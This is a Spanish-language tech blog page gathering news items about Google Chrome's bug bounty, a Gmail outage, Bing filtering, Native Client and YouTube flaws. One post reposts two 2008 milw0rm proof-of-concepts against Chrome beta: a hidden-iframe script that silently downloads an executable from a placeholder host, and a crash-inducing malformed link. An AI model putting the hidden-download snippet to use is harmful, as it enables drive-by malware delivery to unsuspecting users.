kernelpanic.org.mx

En su blog oficial, Google promete una recompensa en dinero efectivo a quienes encuentren agujeros de seguridad en el navegador Chrome o en el proyecto Chromium, en el que está basado el navegador.

En general, toda forma de vulnerabilidad detectada permitirá optar a una recompensa. Naturalmente, Google se interesa por recibir información sobre las vulnerabilidades de rango crítico, aunque precisa que todos los “bugs” (errores de código) o agujeros de seguridad cualifican para participar. Un panel de expertos designados por Google decidirá si el agujero detectado es lo suficientemente serio como para generar un pago.

En el blog se indica que las vulnerabilidades generarán de manera estándar una recompensa de 500 dólares. La empresa también considerará pagar una recompensa extraordinaria de 1337 dólares a quien detecte una vulnerabilidad especialmente grave. Naturalmente, “1337″ es un código usado entre hackers para referirse a la “elite”.

En una conferencia de hackers realizada en 2009, Chrome fue el único navegador que salió ileso en una competencia de intrusiones realizadas por algunos de los principales expertos en seguridad informática del mundo.

Google precisa que sus propios empleados no podrán participar en el concurso. Más información en el blog de Chromium.

Hay razones para suponer que Google se ha inspirado en un concurso similar organizado por Mozilla, donde el premio estándar también es de 500 dólares

Fuente: Blog de Google

Las réplicas del colapso de Gmail aún se hacen sentir durante la mañana del 2 de septiembre. En el grupo #googlefail de Twitter aún se informa sobre problemas de acceso e inestabilidad para algunos de los 150 millones de usuarios de Gmail.

Según el blog de Google, la caída de Gmail se debería a un nivel excesivo de tráfico en sus servidores. En otras palabras, Google está teniendo problemas de crecimiento, y aún con su enorme parque de servidores no logra gestionar todo el tráfico que generan sus servicios.

Ben Treynor, empleado de Google, explica la situación en el blog de la empresa: “Alrededor de las 12:30, hora del Pacífico, algunos de nuestros enrutadores se vieron desbordados, por lo que redireccionaron el tráfico hacia otros enrutadores. La situación se replicó, por lo que en el transcurso de pocos minutos todos los enrutadores dejaron de funcionar. Así, los usuarios de Gmail no pudieron conectarse al servicio mediante su navegador, debido a que las llamadas al servidor no podían ser direccionadas a un servidor de Gmail. IMAP y POP continuaron funcionando normalmente. Lo mismo ocurrió con la gestión del correo electrónico, debido a que estos procesos no usan los mismos enrutadores que se vieron afectados por el problema técnico”.

No es la primera vez que Gmail queda fuera de servicio. Situaciones similares ocurrieron en febrero, marzo y mayo.

Fuente: Blog oficial de Google

IDC escribe que las demás variantes de Linux podrían verse perjudicadas por Chrome (Chrome en sí es una variante de Linux), especialmente en el lucrativo mercado de los netbooks.

Linux fue el sistema operativo que inicialmente fue usado en los netbooks, siendo posteriormente sustituido por Windows XP. Actualmente hay algunos modelos de netbooks comercializados con una versión de Linux preinstalada, como por ejemplo Ubuntu.

Esto llevó a muchos partidarios de Linux a confiar en que la propagación de los netbooks contribuiría a dar mayor popularidad a Linux, especialmente en PCs para consumidores.

A juicio de IDC, el prestigio de Google podría ensombrecer la emergente popularidad de algunas distribuiciones de Linux. Es un hecho comprobado que los consumidores prefieren marcas conocidas, y en tal sentido Google tiene una considerable ventaja.

En algunos foros de Internet especializados en el tema se desaconseja una confrontación con Google, postulando más bien una coexistencia pacífica.

Fuente: IDC

zk

Poco después de que el conservador sitio estadounidense Fox News calificara el nuevo buscador Bing de “portal pornográfico”, Microsoft aplicó una serie de medidas tendientes a facilitar la filtración de contenidos inapropiados.

La facilidad de uso del sistema y su funcionalidad llevaron a un observador de ZDnet a sugerir a Google instaurar un sistema parecido en su buscador.

Es sabido que un gran número de escuelas y de padres bloquean la función de búsqueda de imágenes en Google, con el fin de evitar la presentación de fotografías e ilustraciones pornográficas a menores de edad. El filtro en cuestión es controlado por el propio usuario, y no por administradores de red. Esto resulta en que muchos usuarios sencillamente no saben qué hacer. Microsoft parece haber encontrado la solución.

Bing filtra los contenidos “adultos”, antes que éstos sean presentados al usuario, creando un dominio específico para este material. El dominio en cuestión, denominado explicit.bing.net, es invisible para el usuario final, pero facilita el trabajo de los administradores de redes, que puede bloquear el acceso al dominio, y de ésa forma eliminar la visualización de sus imágenes por parte del usuario final.

Bing incluye además en su código la URL de las imágenes y vídeos, haciendo posible que las empresas que hayan bloqueado una página ya no reciban resultados originados en ésta.

diarioti.

Las actuales aplicaciones web ya sea están basadas en estándares como los del concepto Ajax o en tecnologías que mediante extensiones del navegador integran otras categorías de contenidos en sitios web corrientes. Ejemplos de estos son los tecnologías Flash, Java y Silverlight.

Google es una compañía que ha invertido considerable trabajo y recursos en el desarrollo de aplicaciones basadas en la web. Tanto así que la compañía está desarrollando su propio navegador, Chrome, que con su sencillo interfaz elimina elementos distractores cuando los usuarios están más bien ocupados en los contenidos presentados por las aplicaciones web ejecutadas en el propio navegador.

Chrome incorpora el motor Javascript V8, que proporciona un desempeño en Javascript considerablemente mejor que la mayoría de los navegadores existentes. Sin embargo, todo indica que Google estima que Javascript no está, en sí, en condiciones de entregar el rendimiento que de muchas formas es necesario para que una aplicación web resulte en la misma experiencia para el usuario que una aplicación ejecutada localmente en el PC.

Una solución para lo anterior es traspasar determinadas tareas a una de las citadas extensiones, pero Google no acostumbra basar sus soluciones en tecnologías controladas por los competidores.

Por tal razón, Google está desarrollando su propia extensión para el navegador. Esta sería “neutral”; es decir, funcionaría con todos los navegadores, y sería compatible con todas las versiones modernas, x86, de Windows, Macintosh y Linux. La empresa desarrolla además soporte para otras arquitecturas de procesadores, como por ejemplo ARM y PPC, lo que abre la posibilidad de soporte para teléfonos móviles y consolas de juegos, entre otras cosas.

La finalidad elemental de la futura extensión, denominada Native Client (NaCl), sería dar a las aplicaciones web mucho mejor acceso a la capacidad de cálculo del procesador.

En un comentario en su blog, Brad Chen, del grupo Native Client, de Google, plantea el ejemplo de un sitio para el intercambio y edición de fotografías, que permite al usuario editar las fotos directamente en el navegador, sin abandonar sitio web. Esto puede ser conseguido actualmente, por ejemplo, usando una combinación de JavaScript y ejecución del servicio en el servidor. Esto requiere, sin embargo, el flujo de grandes volúmenes de datos entre el navegador y el servidor, lo que puede ocasionar grandes esperas, incluso cuando el usuario sólo decide hacer pequeños cambios a sus imágenes.

Otras posibilidades involucran el uso del gráfica 3D.

“La posibilidad de poder ejecutar código específico para sistemas en el PC del usuario permite realizar el procesamiento de las imágenes en la propia CPU del PC del usuario, lo que resulta en una aplicación mucho más ágil, al reducirse fuertemente la transmisión de datos y con ello los retrasos”, escribe Chen.

A juicio de Chen, uno de los principales desafíos es la seguridad. “Para contribuir a proteger a los usuarios de malware, conservando la movilidad, hemos definido estrictas reglas para los módulos aceptados”, escribe Chen. Entre otras cosas, los módulos deberán ser elaborados según una serie de criterios estructurales que hacen posible convertirlos en instrucciones. Asimismo, no estará permitido que los módulos contengan determinadas secuencias de instrucciones.

“Este marco estructural apunta a permitir a nuestro runtime detectar y evitar la ejecución de propagación de código potencialmente maligno. Entendemos que es un gran desafío hacer que esta tecnología sea segura y precisamente por esa razón la convertiremos en código abierto en una etapa temprana”, indica Chen.

“A nuestro juicio, la evaluación y los comentarios de la comunidad de desarrolladores, sumada al análisis público de la herramienta, contribuyen considerablemente a mejorar la calidad y seguridad de tecnologías de este tipo”. En ésta página, Google pública una versión de prueba de Native Client. La instalación es compleja e indudablemente no está adaptadas a usuarios finales, solo a expertos.

Versiones de pruebas están disponibles para Windows, Mac y Linux, y para los navegadores Firefox, Safari, Opera y Chrome. El hecho que no se incorpore el navegador Internet Explorer obedece a que éste no tiene, desde 2001, soporte para Netscape Plugin Application Programming Interface (NPAPI). Desde ese año, todas las extensiones para Internet Explorer debieron ser basadas en ActiveX. Los demás navegadores tienen soporte para NPAPI.

La publicación Golem.de ha publicado un vídeo en Youtube , que muestra algunos ejemplos de lo que es posible hacer al tener instalado Native Client.

Fuentes: Blog de Native Client y Golem.

Visitando  http://www.milw0rm.com/ me di cuenta de la vulnerabilidad del nuevo navegador de google.

El fallo radica en la librería chrome.dll del navegador que permite bloquear todas las pestañas del Google Chrome mostrando el mensaje “!Vaya¡ Google Chrome ha fallado. ¿Deseas reiniciar?” con solo visitar un enlace en una pagina mal intencionada, pasando por alto la aclamada funcionalidad de “pestañas independientes” de este navegador.

Para ver el articulo completo de la descripcion del fallo ve a:
http://www.dragonjar.org/

***************************************************************************
 Author: nerex
 E-mail: nerex[at]live[dot]com

 Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically
 downloaded to the user's computer without any user prompt.

 This proof-of-concept was created for educational purposes only.
 Use the code it at your own risk.
 The author will not be responsible for any damages.

 Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA)
**************************************************************************
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0"
 height="0">');
</script>

# milw0rm.com [2008-09-03]

______________________________________________________________________________________

---------------------------------------------------
Software:
Google Chrome Browser 0.2.149.27

Tested:
Windows XP Professional SP3

Result:
Google Chrome Crashes with All Tabs

Problem:
An issue exists in how chrome behaves with undefined-handlers in chrome.dll version
0.2.149.27. A crash can result without user interaction. When a user is made to visit
a malicious link, which has an undefined handler followed by a 'special' character,
the chrome crashes with a Google Chrome message window "Whoa! Google Chrome has crashed.
Restart now?". It lies in dealing with the POP EBP instruction when pointed out by the
EIP register at 0x01002FF4.

Proof of Concept:

http://evilfingers.com/advisory/google_chrome_poc.php

Credit:
Rishi Narang (psy.echo)
www.greyhat.in
www.evilfingers.com
---------------------------------------------------

PoC Working/Exploit:
Click for a demo &lt;a href="EVIL:%"&gt;HERE&lt;/a&gt;

# milw0rm.com [2008-09-03]

“Solucionen los problemas de seguridad de YouTube, o yo revelaré las vulnerabilidades”, amenaza hacker.

Diario Ti: El hacker Christian Matthies dice haber encontrado numerosos agujeros de seguridad en YouTube. Según Matthies, si Google no soluciona a la mayor brevedad las vulnerabilidades, él las hará públicas.

Ultimátum
El hacker asegura que Google no ha respondido sus mensajes de correo electrónico en que se refiere a las más de 40 vulnerabilidades que existirían en YouTube y que a su juicio comprometen la seguridad de los usuarios.

La publicación The Register indica que Google respondió sólo cuando el hacker publicó su advertencia en sla.ckers.org.

Según trascendió, la mayoría de los errores se basan en la posibilidad de ejecutar código maligno mediante las diversas funciones que tiene YouTube.

Posible intervenir perfiles
Matthies indica que los agujeros permiten además eliminar o alterar los perfiles de los usuarios. Una vez instalados, los códigos harían posible además hurtar información y distribuir spam.

Google ha anunciado que corregirá las vulnerabilidades.

Fuente: The Register